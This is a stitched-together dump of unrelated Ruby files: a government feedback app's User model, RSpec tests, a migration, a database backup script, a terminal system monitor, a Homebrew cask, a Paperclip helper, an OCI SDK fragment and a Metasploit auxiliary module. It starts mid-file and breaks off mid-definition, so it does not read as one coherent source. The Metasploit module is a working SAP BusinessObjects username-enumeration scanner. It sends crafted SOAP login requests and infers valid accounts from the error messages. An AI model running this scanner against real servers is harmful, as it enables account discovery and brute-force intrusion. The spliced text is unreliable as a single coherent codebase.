errors.add(:api_key, "is not 40 characters, as expected from api.data.gov.")
end
end
after_create :send_new_user_notification
APPROVED_DOMAINS = [".gov", ".mil"]
validates :email, presence: true, if: :tld_check
scope :active, -> { where("inactive ISNULL or inactive = false") }
def self.admins
User.where(admin: true)
end
def self.from_omniauth(auth)
# Set login_dot_gov as Provider for legacy TP Devise accounts
# TODO: Remove once all accounts are migrated/have `provider` and `uid` set
@existing_user = User.find_by_email(auth.info.email)
if @existing_user && !@existing_user.provider.present?
@existing_user.provider = auth.provider
@existing_user.uid = auth.uid
@existing_user.save
end
# For login.gov native accounts
where(provider: auth.provider, uid: auth.uid).first_or_create do |user|
user.email = auth.info.email
user.password = Devise.friendly_token[0,24]
end
end
def tld_check
unless ENV['GITHUB_CLIENT_ID'].present? or APPROVED_DOMAINS.any? { |word| email.end_with?(word) }
errors.add(:email, "is not from a valid TLD - #{APPROVED_DOMAINS.to_sentence} domains only")
return false
end
# Call this from here, because I want to hard return if email fails.
# Specifying `ensure_organization` as validator
# ran every time (even when email was not valid), which was undesirable
ensure_organization
end
def organization_name
if organization.present?
organization.name
elsif admin?
"Admin"
end
end
def role
if self.admin?
"Admin"
else
"User"
end
end
# For Devise
# This determines whether a user is inactive or not
def active_for_authentication?
self && !self.inactive?
end
# For Devise
# This is the flash message shown to a user when inactive
def inactive_message
"User account is inactive"
end
def deactivate
self.inactive = true
self.save
UserMailer.account_deactivated_notification(self).deliver_later
Event.log_event(Event.names[:user_deactivated], "User", self.id, "User account #{self.email} deactivated on #{Date.today}")
end
def self.send_account_deactivation_notifications(expire_days)
users = User.deactivation_pending(expire_days)
users.each do | user |
UserMailer.account_deactivation_scheduled_notification(user.email, expire_days).deliver_later
end
end
def self.deactivation_pending(expire_days)
min_time = ((90 - expire_days) + 1).days.ago
max_time = (90 - expire_days).days.ago
User.active.where("(last_sign_in_at ISNULL AND created_at BETWEEN ? AND ?) OR (last_sign_in_at BETWEEN ? AND ?)", min_time, max_time, min_time, max_time)
end
def self.deactivate_inactive_accounts
# Find all accounts scheduled to be deactivated in 14 days
users = User.active.where("(last_sign_in_at ISNULL AND created_at <= ?) OR (last_sign_in_at <= ?)", 90.days.ago, 90.days.ago)
users.each do | user |
user.deactivate
end
end
def self.to_csv
active_users = self.order("email")
return nil unless active_users.present?
header_attributes = ["organization_name", "email", "last_sign_in_at"]
attributes = active_users.map { |u| {
organization_name: u.organization.name,
email: u.email,
last_sign_in_at: u.last_sign_in_at
}}
CSV.generate(headers: true) do |csv|
csv << header_attributes
attributes.each do |attrs|
csv << attrs.values
end
end
end
def set_api_key
update(api_key: ApiKey.generator, api_key_updated_at: Time.now)
end
def unset_api_key
update(api_key: nil, api_key_updated_at: nil)
end
private
def parse_host_from_domain(string)
fragments = string.split(".")
if fragments.size == 2
return string
elsif fragments.size == 3
fragments.shift
return fragments.join(".")
elsif fragments.size == 4
fragments.shift
fragments.shift
return fragments.join(".")
end
end
def ensure_organization
return if organization_id.present?
email_address_domain = Mail::Address.new(self.email).domain
parsed_domain = parse_host_from_domain(email_address_domain)
if org = Organization.find_by_domain(parsed_domain)
self.organization_id = org.id
else
UserMailer.no_org_notification(self).deliver_later if self.id
errors.add(:organization, "'#{email_address_domain}' has not yet been configured for Touchpoints - Please contact the Feedback Analytics Team for assistance.")
end
end
def send_new_user_notification
UserMailer.new_user_notification(self).deliver_later
end
end
| 29.095238 | 167 | 0.70231 |
878f90c3dcc077dfc0c600f983f62460071c0809 | 3,225 | require 'spec_helper'
require 'nokogiri'
describe LiquidInterpolatable::Filters do
before do
@filter = Class.new do
include LiquidInterpolatable::Filters
end.new
end
describe 'uri_escape' do
it 'should escape a string for use in URI' do
expect(@filter.uri_escape('abc:/?=')).to eq('abc%3A%2F%3F%3D')
end
it 'should not raise an error when an operand is nil' do
expect(@filter.uri_escape(nil)).to be_nil
end
end
describe 'validations' do
class Agents::InterpolatableAgent < Agent
include LiquidInterpolatable
def check
create_event :payload => {}
end
def validate_options
interpolated['foo']
end
end
it "should finish without raising an exception" do
agent = Agents::InterpolatableAgent.new(name: "test", options: { 'foo' => '{{bar}' })
expect(agent.valid?).to eq(false)
expect(agent.errors[:options].first).to match(/not properly terminated/)
end
end
describe 'to_xpath' do
before do
def @filter.to_xpath_roundtrip(string)
Nokogiri::XML('').xpath(to_xpath(string))
end
end
it 'should escape a string for use in XPath expression' do
[
%q{abc}.freeze,
%q{'a"bc'dfa""fds''fa}.freeze,
].each { |string|
expect(@filter.to_xpath_roundtrip(string)).to eq(string)
}
end
it 'should stringify a non-string operand' do
expect(@filter.to_xpath_roundtrip(nil)).to eq('')
expect(@filter.to_xpath_roundtrip(1)).to eq('1')
end
end
describe 'to_uri' do
before do
@agent = Agents::InterpolatableAgent.new(name: "test", options: { 'foo' => '{% assign u = s | to_uri %}{{ u.path }}' })
@agent.interpolation_context['s'] = 'http://example.com/dir/1?q=test'
end
it 'should parse an abosule URI' do
expect(@filter.to_uri('http://example.net/index.html', 'http://example.com/dir/1')).to eq(URI('http://example.net/index.html'))
end
it 'should parse an abosule URI with a base URI specified' do
expect(@filter.to_uri('http://example.net/index.html', 'http://example.com/dir/1')).to eq(URI('http://example.net/index.html'))
end
it 'should parse a relative URI with a base URI specified' do
expect(@filter.to_uri('foo/index.html', 'http://example.com/dir/1')).to eq(URI('http://example.com/dir/foo/index.html'))
end
it 'should parse an abosule URI with a base URI specified' do
expect(@filter.to_uri('http://example.net/index.html', 'http://example.com/dir/1')).to eq(URI('http://example.net/index.html'))
end
it 'should stringify a non-string operand' do
expect(@filter.to_uri(123, 'http://example.com/dir/1')).to eq(URI('http://example.com/dir/123'))
end
it 'should return a URI value in interpolation' do
expect(@agent.interpolated['foo']).to eq('/dir/1')
end
it 'should return a URI value resolved against a base URI in interpolation' do
@agent.options['foo'] = '{% assign u = s | to_uri:"http://example.com/dir/1" %}{{ u.path }}'
@agent.interpolation_context['s'] = 'foo/index.html'
expect(@agent.interpolated['foo']).to eq('/dir/foo/index.html')
end
end
end
| 32.25 | 133 | 0.64062 |
1c5263c1941a541375f4b52755f96d1e2e0672b1 | 743 | require 'spec_helper'
describe CarrierWave::Uploader::Base do
let(:uploader) do
Class.new(CarrierWave::Uploader::Base)
end
let(:derived_uploader) do
Class.new(uploader)
end
it 'inserts :gcloud as a known storage engine' do
uploader.configure do |config|
expect(config.storage_engines).to have_key(:gcloud)
end
end
it 'defines gcloud specific storage options' do
expect(uploader).to respond_to(:gcloud_attributes)
end
it 'defines gcloud_credentials option on uploader' do
expect(uploader).to respond_to(:gcloud_credentials)
end
it 'defines gcloud_authenticated_url_expiration option on uploader' do
expect(uploader).to respond_to(:gcloud_authenticated_url_expiration)
end
end | 24.766667 | 72 | 0.748318 |
bbac728602223a7e5bf8a8985442b0e09217b26f | 337 | class CreatePosts < ActiveRecord::Migration
def change
create_table :posts do |t|
t.integer :author_id
t.string :title
t.text :content
t.string :intention_type
t.string :intention_statement
t.boolean :published, default: false
t.datetime :published_at
t.timestamps
end
end
end
| 22.466667 | 43 | 0.664688 |
abeeb579e9b5f1cdb2bf5d4dae8f4bd84484657c | 3,412 | #-- encoding: UTF-8
#-- copyright
# OpenProject is a project management system.
# Copyright (C) 2012-2015 the OpenProject Foundation (OPF)
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License version 3.
#
# OpenProject is a fork of ChiliProject, which is a fork of Redmine. The copyright follows:
# Copyright (C) 2006-2013 Jean-Philippe Lang
# Copyright (C) 2010-2013 the ChiliProject Team
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; either version 2
# of the License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.
#
# See doc/COPYRIGHT.rdoc for more details.
#++
require 'legacy_spec_helper'
describe Attachment, type: :model do
fixtures :all
it 'should create' do
a = Attachment.new(container: WorkPackage.find(1),
file: uploaded_test_file('testfile.txt', 'text/plain'),
author: User.find(1))
assert a.save
assert_equal 'testfile.txt', a.filename
assert_equal 57, a.filesize
assert_equal 'text/plain', a.content_type
assert_equal 0, a.downloads
assert_equal 'f94d862ca1e4363e760431025673826c', a.digest
assert File.exist?(a.diskfile)
end
it 'should create should auto assign content type' do
a = Attachment.new(container: WorkPackage.find(1),
file: uploaded_test_file('testfile.txt', ''),
author: User.find(1))
assert a.save
assert_equal 'text/plain', a.content_type
end
it 'should identical attachments at the same time should not overwrite' do
a1 = Attachment.create!(container: WorkPackage.find(1),
file: uploaded_test_file('testfile.txt', ''),
author: User.find(1))
a2 = Attachment.create!(container: WorkPackage.find(1),
file: uploaded_test_file('testfile.txt', ''),
author: User.find(1))
assert a1.diskfile.path != a2.diskfile.path
end
context 'Attachmnet#attach_files' do
it 'should add unsaved files to the object as unsaved attachments' do
# Can't use with_settings: here due to before hook
expect(Setting).to receive(:attachment_max_size)
.exactly(4).times
.and_return(0)
@issue = WorkPackage.find(1)
response = Attachment.attach_files(
@issue,
'1' => { 'file' => LegacyFileHelpers.mock_uploaded_file, 'description' => 'test 1' },
'2' => { 'file' => LegacyFileHelpers.mock_uploaded_file, 'description' => 'test 2' })
assert response[:unsaved].present?
assert_equal 2, response[:unsaved].length
assert response[:unsaved].first.new_record?
assert response[:unsaved].second.new_record?
assert_equal response[:unsaved], @issue.unsaved_attachments
end
end
end
| 39.674419 | 93 | 0.67966 |
f8ebc0bc2aa847458d0e93710e8135ee3d2a0f8e | 71 | module Dry
module Validation
VERSION = '0.12.2'.freeze
end
end
| 11.833333 | 29 | 0.676056 |
e8f2f417b30df65f84c2c28c7dcd87cc72f072e5 | 1,403 | module RdsDbBackup
module Factory
class Export
include Concerns::Resources
def fetch
last_backup_filename = find_last_backup
tmp_file_path = File.join(File.dirname(__FILE__), '../tmp', last_backup_filename)
if !File.exists?(tmp_file_path)
s3_file_path = "s3://#{db_bucket}/#{last_backup_filename}"
run("aws s3 cp #{s3_file_path} #{tmp_file_path} --region #{region}")
end
DbBackupFile.new(tmp_file_path, last_backup_filename)
end
def update_dev
db_dump_path = fetch.tmp_file
db_command(:drop)
db_command(:create)
run("gunzip < #{db_dump_path} | mysql #{credentials} #{dev_db_name}")
end
private
def db_command(command)
run("mysqladmin #{credentials} --force #{command} #{dev_db_name}")
end
def credentials
[
"-u#{dev_db_username}",
"-h#{dev_db_host}",
"-P#{dev_db_port}",
"-p#{dev_db_password}"
] * ' '
end
def find_last_backup
backups = run("aws s3 ls s3://#{db_bucket} --region #{region} | grep #{project.production_db_name}").split("\n")
backups.map! do |line|
columns = line.split(" ")
modified_at = Time.parse(columns[0..1] * ' ')
[modified_at, columns.last]
end
end
end
end
end
| 24.614035 | 120 | 0.571632 |
269e7c1cb99e30dbd87d5963bfe07e3a3a60f639 | 5,667 | module Termclock
FILESYSTEM, FILESYSTEM_LABEL = if LS::FS.stat('/')[:blocks].to_i == 0
_pwd = Dir.pwd
pwd = _pwd.length > 8 ? _pwd[0..5] + '...' : _pwd
[?..freeze, pwd]
else
[?/.freeze, ?/.freeze]
end.freeze
@@cpu_usage = 0
@@cpu_usage_t = Thread.new { }.join
_tr = translate('Curr. DL/UL')
@@current_net_usage = "\u{1F4CA} #{_tr}:"
@@current_net_usage_t = Thread.new { }.join
class << self
def system_info(width, tc1, tc2, bold, italic)
unless @@cpu_usage_t.alive?
@@cpu_usage_t = Thread.new {
_cpu_usage = LS::CPU.usage(0.25)
@@cpu_usage = _cpu_usage ? "%0.2f".freeze % _cpu_usage : nil
}
end
unless @@current_net_usage_t.alive?
@@current_net_usage_t = Thread.new do
_m = LS::Net.current_usage(0.25)
_dl = _m[:received]
_ul = _m[:transmitted]
@@current_net_usage = if _dl && _ul
_tr = translate('Curr. DL/UL')
dl = LS::PrettifyBytes.convert_short_decimal(_dl)
ul = LS::PrettifyBytes.convert_short_decimal(_ul)
"\u{1F4CA} #{_tr}: #{t!("%-9s" % dl)} | #{t!("%9s" % ul)}"
else
EMPTY
end
end
end
cpu = if @@cpu_usage
_tr = translate('CPU')
"\u{1F9E0} #{_tr}: #{t!("%6s" % @@cpu_usage)}% (#{t!(LS::CPU.count_online)}/#{t!(LS::CPU.count)})"
else
EMPTY
end
battery = if LS::Battery.present?
stat = LS::Battery.stat
charge = stat[:charge].to_i
emoji, plug = "\u{1F50B}".freeze, EMPTY
if LS::Battery.charging?
emoji, plug = "\u{1F4A1}".freeze, "\u{1F50C} ".freeze
end
lives = "\u2665 ".freeze.*(charge.fdiv(20).ceil).chop
_tr = translate('Battery')
"#{emoji} #{_tr}: #{t!(charge)}% #{lives} (#{plug}#{translate(stat[:status])})"
else
EMPTY
end
_tr = translate('User')
user = "\u{1F481} #{_tr}: #{LS::User.get_current_user.capitalize}"
_tr = translate('Hostname')
hostname = "\u{1F4BB} #{_tr}: #{LS::OS.hostname}"
_tr = translate('IP Addr')
_m = LS::Net.total_bytes
ip = "\u{1F30F} #{_tr}: #{translate(LS::Net.ipv4_private, b: true)}"
_received = _m[:received]
_transmitted = _m[:transmitted]
_tr = translate('Totl. DL/UL')
tot_received = _received ? "\u{1F4C8} #{_tr}: #{t!('%-9s'.freeze % LS::PrettifyBytes.convert_short_decimal(_m[:received]))}" : nil
tot_transmitted = _transmitted ? " | #{t!('%9s'.freeze % LS::PrettifyBytes.convert_short_decimal(_transmitted))}" : nil
net_usage = if tot_received && tot_transmitted
tot_received + tot_transmitted
else
EMPTY
end
_m = LS::Memory.stat
_m.default = 0
_tr = translate('Mem')
memory = "\u{1F3B0} #{_tr}: #{t!(LS::PrettifyBytes.convert_short_decimal(_m[:used] * 1000))}"\
" / #{t!(LS::PrettifyBytes.convert_short_decimal(_m[:total] * 1000))}"\
" (#{t!("%.2f" % _m[:percent_used])}%)"
_m = LS::Swap.stat
_m.default = 0
_tr = translate('Swap')
swap = "\u{1F300} #{_tr}: #{t!(LS::PrettifyBytes.convert_short_decimal(_m[:used] * 1000))}"\
" / #{t!(LS::PrettifyBytes.convert_short_decimal(_m[:total] * 1000))}"\
" (#{t!("%.2f" % _m[:percent_used])}%)"
_m = LS::Filesystem.stat(FILESYSTEM)
_m.default = 0
_tr = translate('FS')
fs = "\u{1F4BD} #{_tr} (#{FILESYSTEM_LABEL}): #{t!(LS::PrettifyBytes.convert_short_decimal(_m[:used]))}"\
" / #{t!(LS::PrettifyBytes.convert_short_decimal(_m[:total]))}"\
" (#{t!("%.2f" % _m[:used].*(100).fdiv(_m[:total]).round(2))}%)"
pt = LS::Process.types.values
process = if pt.length > 0
_tr = translate('Process')
"\u{1F3ED} #{_tr}: T:#{t!("%4s" % pt.length)}|"\
"R:#{"%3s" % t!(pt.count(:running))}|"\
"S:#{"%3s" % t!(pt.count(:sleeping))}|"\
"I:#{"%3s" % t!(pt.count(:idle))}"
else
EMPTY
end
@@os_v ||= unless LS::OS.version.empty?
" (#{LS::OS.version})"
else
EMPTY
end
_tr = translate('Distrib')
@@os ||= "\u{1F427} #{_tr}: #{LS::OS.distribution} #{LS::OS.machine}#{@@os_v}"
_temp_uptime = LS::OS.uptime
_uptime = unless _temp_uptime.empty?
_temp_uptime
else
_u = LS::OS.uptime_i
{
hour: _u / 3600,
minute: _u % 3600 / 60,
second: _u % 3600 % 60,
jiffy: 0
}
end
_second = _uptime[:second]
_second_i = _second.to_i
hour = "%02d" % _uptime[:hour]
minute = "%02d" % _uptime[:minute]
second = "%02d" % _uptime[:second]
jiffy = "%02d" % _uptime[:jiffy]
_tr = translate('Uptime')
uptime = "\u{1F3A1} #{_tr}: #{t! hour}:#{t! minute}:#{t! second}:#{t! jiffy} (#{t! LS::OS.uptime_i}s)"
_tr = translate('LoadAvg')
_loadavg = LS::Sysinfo.loads.map! { |x| "%.2f" % x }
loadavg = "\u{1F525} #{_tr}: 1m #{translate(_loadavg[0], b: true)}|5m #{translate(_loadavg[1], b: true)}|15m #{translate(_loadavg[2], b: true)}"
all_info = []
max_l = 0
i = -1
[
user, hostname,
@@os, battery,
cpu, ip,
memory, @@current_net_usage,
swap, net_usage,
fs, process,
uptime, loadavg
].each { |x|
unless x.empty?
all_info << x
i += 1
if i.odd?
_x_len = x.length
max_l = _x_len if max_l < _x_len
end
end
}
max_l += 4
all_info.each_slice(2).map { |x, y|
_diff = width.-(x.length + max_l)
_diff = 0 if _diff < 1
y_to_s = y.to_s
padding = "#{SPACE * _diff}"
str = SPACE + x + padding + y_to_s
grads = SPACE + x.gradient(tc1, tc2, bold: bold, italic: italic) +
padding +
y_to_s.gradient(tc1, tc2, bold: bold, italic: italic)
len = str.grapheme_clusters.map { |x|
_x = x.bytesize./(2)
_x == 0 ? 1 : _x
}.sum
w = width - 2
len < w ? grads.+(SPACE.*(w - len)) : grads
}.join(NEWLINE)
end
end
end
| 25.995413 | 147 | 0.57226 |
bbc2bf5e7568f9cc422920a2115a7adbb9e7d28f | 401 | cask 'prizmo' do
version '3.7'
sha256 'd77cf9bfe7adff4e5bd6de6971f5d81d4dfbf9177c6abed62f71d70408aaada2'
url "https://www.creaceed.com/downloads/prizmo#{version.major}_#{version}.zip"
appcast "https://www.creaceed.com/appcasts/prizmo#{version.major}.xml"
name 'Prizmo'
homepage 'https://creaceed.com/prizmo'
auto_updates true
depends_on macos: '>= :yosemite'
app 'Prizmo.app'
end
| 26.733333 | 80 | 0.74813 |
1d41ce14c2554772ef96dd04131d8967a3e1244f | 1,617 | module Paperclip
# The Upfile module is a convenience module for adding uploaded-file-type methods
# to the +File+ class. Useful for testing.
# user.avatar = File.new("test/test_avatar.jpg")
module Upfile
# Infer the MIME-type of the file from the extension.
def content_type
type = (self.path.match(/\.(\w+)$/)[1] rescue "octet-stream").downcase
case type
when %r"jp(e|g|eg)" then "image/jpeg"
when %r"tiff?" then "image/tiff"
when %r"png", "gif", "bmp" then "image/#{type}"
when "txt" then "text/plain"
when %r"html?" then "text/html"
when "js" then "application/js"
when "csv", "xml", "css" then "text/#{type}"
else
# On BSDs, `file` doesn't give a result code of 1 if the file doesn't exist.
content_type = (Paperclip.run("file", "--mime-type #{self.path}").split(':').last.strip rescue "application/x-#{type}")
content_type = "application/x-#{type}" if content_type.match(/\(.*?\)/)
content_type
end
end
# Returns the file's normal name.
def original_filename
File.basename(self.path)
end
# Returns the size of the file.
def size
File.size(self)
end
end
end
if defined? StringIO
class StringIO
attr_accessor :original_filename, :content_type
def original_filename
@original_filename ||= "stringio.txt"
end
def content_type
@content_type ||= "text/plain"
end
end
end
class File #:nodoc:
include Paperclip::Upfile
end
| 29.944444 | 127 | 0.592455 |
ac7ceaedb7c09a8a5d1eaa03eff52827c0daf004 | 299 | require 'rails_helper'
RSpec.describe Contenticus::Block, type: :model do
subject {described_class}
it 'can serialize the fields' do
page = Fabricate.create(:page)
expect{described_class.create!(blockable: page, layout: "pages/frontpage")}.to change(subject, :count).by(1)
end
end
| 23 | 112 | 0.729097 |
2683afb6cbee74d1ea2a68b53b0f68fa5edd73cd | 1,158 | require "." / "lib" / "resolvers" / "core_lib_resolver"
describe WarningShot::CoreLibResolver do
before :all do
WarningShot::CoreLibResolver.logger = $logger
end
it 'should have tests registered' do
WarningShot::CoreLibResolver.tests.empty?.should be(false)
end
it 'should not have resolutions registered' do
WarningShot::CoreLibResolver.resolutions.empty?.should be(true)
end
it 'should increment #errors for unloadable core libs' do
cld = WarningShot::CoreLibResolver.new WarningShot::Config.create,:core_lib,'bogus_core_lib_name'
cld.test!
cld.failed.length.should be(1)
end
it 'should be able to unload file references from $"' do
@originals = $".clone
require 'observer'
WarningShot::CoreLibResolver.unload(($" - @originals))
require('observer').should be(true)
end
it 'should be able to purge classes from memory' do
@original_classes = Symbol.all_symbols
WarningShot::CoreLibResolver.purge true
require 'observer'
WarningShot::CoreLibResolver.purge_classes((Symbol.all_symbols - @original_classes))
defined?(Observer).should be(nil)
end
end | 29.692308 | 101 | 0.717617 |
39771bccfda395d1e917f9ffe630be4603f35329 | 5,410 | require 'rails_helper'
RSpec.feature 'Candidate entering GCSE details' do
include CandidateHelper
scenario 'Candidate submits their maths GCSE details and then update them' do
given_i_am_signed_in
when_i_visit_the_candidate_application_page
and_i_click_on_the_maths_gcse_link
then_i_see_the_add_gcse_maths_page
when_i_do_not_select_any_gcse_option
and_i_click_save_and_continue
then_i_see_the_qualification_type_error
when_i_select_gcse_option
and_i_click_save_and_continue
then_i_see_add_grade_page
when_i_fill_in_the_grade
and_i_click_save_and_continue
then_i_see_add_year_page
when_i_fill_in_the_year
and_i_click_save_and_continue
then_i_see_the_review_page_with_correct_details
when_i_click_continue
then_i_see_a_section_complete_error
when_i_click_to_change_qualification_type
then_i_see_the_gcse_option_selected
when_i_select_a_different_qualification_type
and_i_click_save_and_continue
then_i_see_the_grade_page
and_i_see_the_gcse_grade_entered
when_i_enter_a_different_qualification_grade
and_i_click_save_and_continue
then_i_see_the_gcse_year_entered
when_i_enter_a_different_qualification_year
and_i_click_save_and_continue
then_i_see_the_review_page_with_updated_year
when_i_mark_the_section_as_completed
and_click_continue
then_i_see_the_maths_gcse_is_completed
when_i_click_on_the_english_gcse_link
then_i_see_the_add_gcse_english_page
when_i_select_gcse_option
and_i_click_save_and_continue
then_i_see_add_english_grade_page
when_i_choose_to_return_later
then_i_am_returned_to_the_application_form
end
def given_i_am_signed_in
create_and_sign_in_candidate
end
def and_i_click_on_the_maths_gcse_link
click_on 'Maths GCSE or equivalent'
end
def when_i_select_gcse_option
choose('GCSE')
end
def and_i_click_save_and_continue
click_button t('save_and_continue')
end
def when_i_do_not_select_any_gcse_option; end
def when_i_visit_the_candidate_application_page
visit '/candidate/application'
end
def then_i_see_the_add_gcse_maths_page
expect(page).to have_content 'What type of qualification in maths do you have?'
end
def then_i_see_the_review_page_with_correct_details
expect(page).to have_content 'Maths GCSE or equivalent'
expect(page).to have_content 'GCSE'
expect(page).to have_content 'A'
expect(page).to have_content '1990'
end
def then_i_see_the_review_page_with_updated_year
expect(page).to have_content '2000'
end
def then_i_see_add_grade_page
expect(page).to have_content t('gcse_edit_grade.page_title', subject: 'maths', qualification_type: 'GCSE')
end
def then_i_see_add_year_page
expect(page).to have_content t('gcse_edit_year.page_title', subject: 'maths', qualification_type: 'GCSE')
end
def when_i_fill_in_the_grade
fill_in 'Please specify your grade', with: 'A'
end
def when_i_fill_in_the_year
fill_in 'Enter year', with: '1990'
end
def then_i_see_the_qualification_type_error
expect(page).to have_content 'Select the type of qualification'
end
def then_i_see_the_gcse_option_selected
expect(find_field('GCSE')).to be_checked
end
def then_i_see_the_grade_page
expect(page).to have_content t('gcse_edit_grade.page_title', subject: 'maths', qualification_type: 'Scottish National 5')
end
def and_i_see_the_gcse_grade_entered
expect(page).to have_selector("input[value='A']")
end
def then_i_see_the_gcse_year_entered
expect(page).to have_selector("input[value='1990']")
end
def then_i_see_a_section_complete_error
expect(page).to have_content t('activemodel.errors.models.candidate_interface/section_complete_form.attributes.completed.blank')
end
def when_i_select_a_different_qualification_type
choose('Scottish National 5')
end
def when_i_click_to_change_qualification_type
find_link('Change', href: candidate_interface_gcse_details_edit_type_path(subject: 'maths')).click
end
def when_i_enter_a_different_qualification_grade
fill_in 'Please specify your grade', with: 'BB'
end
def when_i_enter_a_different_qualification_year
fill_in 'Enter year', with: '2000'
end
def when_i_mark_the_section_as_completed
choose t('application_form.completed_radio')
end
def then_i_see_the_maths_gcse_is_completed
expect(page).to have_css('#maths-gcse-or-equivalent-badge-id', text: 'Completed')
end
def and_click_continue
click_button t('continue')
end
def when_i_click_continue
and_click_continue
end
def when_i_click_on_the_english_gcse_link
click_on 'English GCSE or equivalent'
end
def then_i_see_add_english_grade_page
expect(page).to have_content t('multiple_gcse_edit_grade.page_title')
end
def then_i_see_the_add_gcse_english_page
expect(page).to have_content 'What type of qualification in English do you have?'
end
def when_i_choose_to_return_later
visit candidate_interface_gcse_review_path(subject: 'english')
and_i_mark_the_section_as_incomplete
and_click_continue
end
def and_i_mark_the_section_as_incomplete
choose t('application_form.incomplete_radio')
end
def then_i_am_returned_to_the_application_form
expect(page).to have_current_path candidate_interface_application_form_path
end
end
| 27.18593 | 132 | 0.80573 |
1a510f72fe760a75ed6fa2a6f82c191b9feb6015 | 3,372 | ##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Auxiliary
include Msf::Exploit::Remote::HttpClient
include Msf::Auxiliary::Report
include Msf::Auxiliary::AuthBrute
include Msf::Auxiliary::Scanner
def initialize
super(
'Name' => 'SAP BusinessObjects User Enumeration',
'Description' => %Q{
This module simply attempts to enumerate SAP BusinessObjects
users.The dswsbobje interface is only used to verify valid
users for CmcApp. Therefore, any valid users that have been
identified can be leveraged by logging into CmcApp.
},
'References' =>
[
# General
[ 'URL', 'http://spl0it.org/files/talks/source_barcelona10/Hacking%20SAP%20BusinessObjects.pdf' ]
],
'Author' => [ 'Joshua Abraham <jabra[at]rapid7.com>' ],
'License' => MSF_LICENSE
)
register_options(
[
Opt::RPORT(8080),
OptString.new('URI', [false, 'Path to the SAP BusinessObjects Axis2', '/dswsbobje']),
])
register_autofilter_ports([ 8080 ])
end
def run_host(ip)
res = send_request_cgi({
'uri' => normalize_uri(datastore['URI'], "/services/listServices"),
'method' => 'GET'
}, 25)
return if not res
each_user_pass { |user, pass|
enum_user(user)
}
end
def enum_user(user='administrator', pass='invalid-sap-password-0d03b389-b7a1-4ecc-8898-e62d1836b72a')
vprint_status("#{rhost}:#{rport} - Enumerating username:'#{user}'")
success = false
soapenv='http://schemas.xmlsoap.org/soap/envelope/'
xmlns='http://session.dsws.businessobjects.com/2007/06/01'
xsi='http://www.w3.org/2001/XMLSchema-instance'
data = '<?xml version="1.0" encoding="utf-8"?>' + "\r\n"
data << '<soapenv:Envelope xmlns:soapenv="' + soapenv + '" xmlns:ns="' + xmlns + '">' + "\r\n"
data << '<soapenv:Body>' + "\r\n"
data << '<login xmlns="' + xmlns + '">' + "\r\n"
data << '<credential xmlns="' + xmlns + '" xmlns:ns="' + xmlns + '" xmlns:xsi="' + xsi + '" Login="' + user + '" Password="' + pass + '" xsi:type="ns:EnterpriseCredential" />' + "\r\n"
data << '</login>' + "\r\n"
data << '</soapenv:Body>' + "\r\n"
data << '</soapenv:Envelope>' + "\r\n\r\n"
begin
res = send_request_raw({
'uri' => normalize_uri(datastore['URI']) + "/services/Session",
'method' => 'POST',
'data' => data,
'headers' =>
{
'Content-Length' => data.length,
'SOAPAction' => '"' + 'http://session.dsws.businessobjects.com/2007/06/01/login' + '"',
'Content-Type' => 'text/xml; charset=UTF-8',
}
}, 45)
if res
return :abort if (!res or (res and res.code == 404))
success = true if(res and res.body.match(/Invalid password/i))
success
else
vprint_error("[SAP BusinessObjects] No response")
return :abort
end
rescue ::Rex::ConnectionError
vprint_error("[SAP BusinessObjects] Unable to attempt authentication")
return :abort
end
if success
print_good("[SAP BusinessObjects] Found valid username : '#{user}'")
return :next_user
else
return
end
end
end
| 32.423077 | 189 | 0.591934 |
4a3e5d9f9e59aba278ff8be62a1fed748ca67f54 | 333 | class AdoptADog::Dogs
attr_accessor :name, :breed, :location, :url, :story, :shelter
@@all = []
def initialize(name, breed, location, url)
@name = name
@breed = breed
@location = location
@url = url
@@all << self
end
def self.all
@@all
end
def self.limit_nine
@@all.slice(0,9)
end
end
| 15.136364 | 64 | 0.594595 |
aca8724bb05c4e27904f45351604e72c460c3b3a | 12,819 | # Copyright (c) 2016, 2021, Oracle and/or its affiliates. All rights reserved.
# This software is dual-licensed to you under the Universal Permissive License (UPL) 1.0 as shown at https://oss.oracle.com/licenses/upl or Apache License 2.0 as shown at http://www.apache.org/licenses/LICENSE-2.0. You may choose either license.
require 'date'
require 'logger'
require_relative 'typed_object'
# rubocop:disable Lint/UnneededCopDisableDirective, Metrics/LineLength
module OCI
# Parameters are created and assigned values that can be configured for each integration task.
class DataIntegration::Models::Parameter < DataIntegration::Models::TypedObject
OUTPUT_AGGREGATION_TYPE_ENUM = [
OUTPUT_AGGREGATION_TYPE_MIN = 'MIN'.freeze,
OUTPUT_AGGREGATION_TYPE_MAX = 'MAX'.freeze,
OUTPUT_AGGREGATION_TYPE_COUNT = 'COUNT'.freeze,
OUTPUT_AGGREGATION_TYPE_SUM = 'SUM'.freeze,
OUTPUT_AGGREGATION_TYPE_UNKNOWN_ENUM_VALUE = 'UNKNOWN_ENUM_VALUE'.freeze
].freeze
# This can either be a string value referencing the type or a BaseType object.
# @return [Object]
attr_accessor :type
# The default value of the parameter.
# @return [Object]
attr_accessor :default_value
# The default value of the parameter which can be an object in DIS, such as a data entity.
# @return [Object]
attr_accessor :root_object_default_value
# Specifies whether the parameter is input value.
# @return [BOOLEAN]
attr_accessor :is_input
# Specifies whether the parameter is output value.
# @return [BOOLEAN]
attr_accessor :is_output
# The output aggregation type.
# @return [String]
attr_reader :output_aggregation_type
# The type of value the parameter was created for.
# @return [String]
attr_accessor :type_name
# Attribute mapping from ruby-style variable name to JSON key.
def self.attribute_map
{
# rubocop:disable Style/SymbolLiteral
'model_type': :'modelType',
'key': :'key',
'model_version': :'modelVersion',
'parent_ref': :'parentRef',
'config_values': :'configValues',
'object_status': :'objectStatus',
'name': :'name',
'description': :'description',
'type': :'type',
'default_value': :'defaultValue',
'root_object_default_value': :'rootObjectDefaultValue',
'is_input': :'isInput',
'is_output': :'isOutput',
'output_aggregation_type': :'outputAggregationType',
'type_name': :'typeName'
# rubocop:enable Style/SymbolLiteral
}
